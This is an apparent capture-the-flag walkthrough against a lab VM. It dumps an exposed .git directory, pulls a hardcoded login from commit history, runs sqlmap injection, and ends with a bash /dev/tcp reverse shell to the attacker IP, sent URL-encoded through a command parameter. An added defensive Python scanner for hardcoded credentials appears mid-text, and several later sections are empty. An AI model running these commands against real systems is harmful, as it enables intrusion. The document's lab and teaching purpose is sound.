Description
Difficulty: Hard
This works better with VMware rather than VirtualBox
Hint: Don’t waste your time For Brute-Force
nmap host discovery

```
kali 192.168.169.220
target 192.168.169.230
```
nmap scan of the target

```
Ports 22 80
Git repository (exposed .git directory)
```
Directories


Using a git tool

```
https://github.com/arthaud/git-dumper
```

```bash
python3 git_dumper.py http://192.168.169.230/.git/ website
```

Review the files



git log



```php
if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
```
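The credential above came out of the repository's commit history, which stays readable to anyone who can fetch the `.git` directory. As an added example (not part of the original write-up), here is a defender-side check that scans `git log -p` output for request parameters compared against string literals. The function name, the regex and the sample diff are assumptions constructed for illustration.

```python
import re

# PHP comparison of a request parameter against a string literal,
# e.g. $_POST['password'] == "secret" (pattern is an assumption of this example)
HARDCODED = re.compile(
    r"""\$_(?:POST|GET|REQUEST|COOKIE)\[\s*['"](?P<param>\w+)['"]\s*\]\s*"""
    r"""={2,3}\s*(?P<q>['"])(?P<value>.*?)(?P=q)"""
)

def scan_git_patch(patch_text):
    # Added (+) and removed (-) lines are both checked: a secret deleted in a
    # later commit is still present in the history stored under .git.
    findings, commit, path = [], None, None
    for line in patch_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith(("+++ ", "--- ")):
            name = line[4:]
            if name != "/dev/null":
                path = name[2:] if name[:2] in ("a/", "b/") else name
        elif line[:1] in ("+", "-"):
            for m in HARDCODED.finditer(line[1:]):
                findings.append({
                    "commit": commit, "file": path, "change": line[0],
                    "param": m.group("param"), "literal": m.group("value"),
                })
    return findings

# Constructed sample: a commit that replaces a hardcoded login check.
SAMPLE = """\
commit 1111111111111111111111111111111111111111
Author: dev <dev@example.invalid>

    use database for login

diff --git a/login.php b/login.php
--- a/login.php
+++ b/login.php
@@ -1,3 +1,3 @@
-    if($_POST['email'] == "user@example.invalid" && $_POST['password'] == "example-pass"){
+    if(check_login($mysqli, $_POST['email'], $_POST['password'])){
"""

if __name__ == "__main__":
    for finding in scan_git_patch(SAMPLE):
        print(finding)
```

In a real repository, feed it the output of `git log -p --all` and rotate any credential it reports, since removing the line in a new commit does not remove it from history.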
Login test


Injection

```bash
sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie PHPSESSID=3ca3jbi4mk3749bv84uu4supol --dbs
```




ssh

```bash
ssh jehad@192.168.169.230
```



```bash
find / -user root -perm -4000 -print 2>/dev/null
```




Writing a shell

```bash
bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
```

```
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
```

```bash
curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"
```




Switching user


Privilege escalation


